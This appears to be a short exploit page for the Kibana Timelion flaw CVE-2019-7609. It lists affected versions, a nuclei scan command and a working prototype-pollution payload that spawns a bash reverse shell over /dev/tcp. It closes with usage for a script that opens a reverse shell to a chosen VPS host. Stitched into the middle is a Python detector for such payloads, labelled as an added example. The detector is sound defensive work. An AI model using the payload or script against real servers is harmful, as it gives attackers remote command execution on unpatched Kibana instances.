    Kibana CVE-2019-7609

    Affected versions

    kibana = 5.6.15
    kibana <= 6.6.0

    POC

    nuclei -tags kibana -t cves/ -l urls.txt

    EXP

    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
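
A defender-side check for the expression shape shown above, as an added example (not part of the original page or of Kibana): it flags Timelion `.props()` calls whose assigned key path walks through `__proto__`. The function names and sample expressions are constructed for illustration, and how expression strings are collected (request bodies, saved objects) is left to the deployment.

```python
import re

# Key-path segments that let an assignment reach Object.prototype.
POLLUTION_SEGMENTS = {"__proto__", "prototype", "constructor"}

# Single- or double-quoted string literals, honouring backslash escapes.
QUOTED = re.compile(r"'(?:\\.|[^'\\])*'" + "|" + r'"(?:\\.|[^"\\])*"', re.S)
PROPS_CALL = re.compile(r"\.props\s*\(")
# A dotted key path (at least one dot) directly followed by '='.
KEY_PATH = re.compile(r"([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+)\s*=")


def props_key_paths(expression):
    """Return the dotted key paths assigned inside every .props(...) call."""
    # Blank out string values so their content can neither hide nor fake a key.
    bare = QUOTED.sub("''", expression)
    paths = []
    for call in PROPS_CALL.finditer(bare):
        depth, end = 1, call.end()
        while end < len(bare) and depth:      # walk to the matching ')'
            depth += {"(": 1, ")": -1}.get(bare[end], 0)
            end += 1
        paths += KEY_PATH.findall(bare[call.end():end])
    return paths


def classify(expression):
    """Return (key_path, reason) findings for one Timelion expression."""
    findings = []
    for path in props_key_paths(expression):
        segments = path.split(".")
        if POLLUTION_SEGMENTS.intersection(segments):
            reason = "prototype-walk"
            if "env" in segments:             # same shape as the expression above
                reason = "prototype-walk into env"
            findings.append((path, reason))
    return findings


# Constructed samples; string values are harmless placeholders.
SAMPLES = [
    ".es(*).props(label='cpu load')",
    ".es(*).props(label.__proto__.env.AAAA='x')",
    ".es(*).props(label='a.__proto__.b=1')",   # key-like text inside a value
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or "clean", "<-", sample)
```
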

    Script

     python CVE-2019-7609.py -u http://xxx.com -host vps-ip -port vps-port --shell
    
    optional arguments:
      -h, --help         show this help message and exit
      -u URL             such as: http://127.0.0.1:5601
      -host REMOTE_HOST  reverse shell remote host: such as: 1.1.1.1
      -port REMOTE_PORT  reverse shell remote port: such as: 8888
      --shell            reverse shell after verify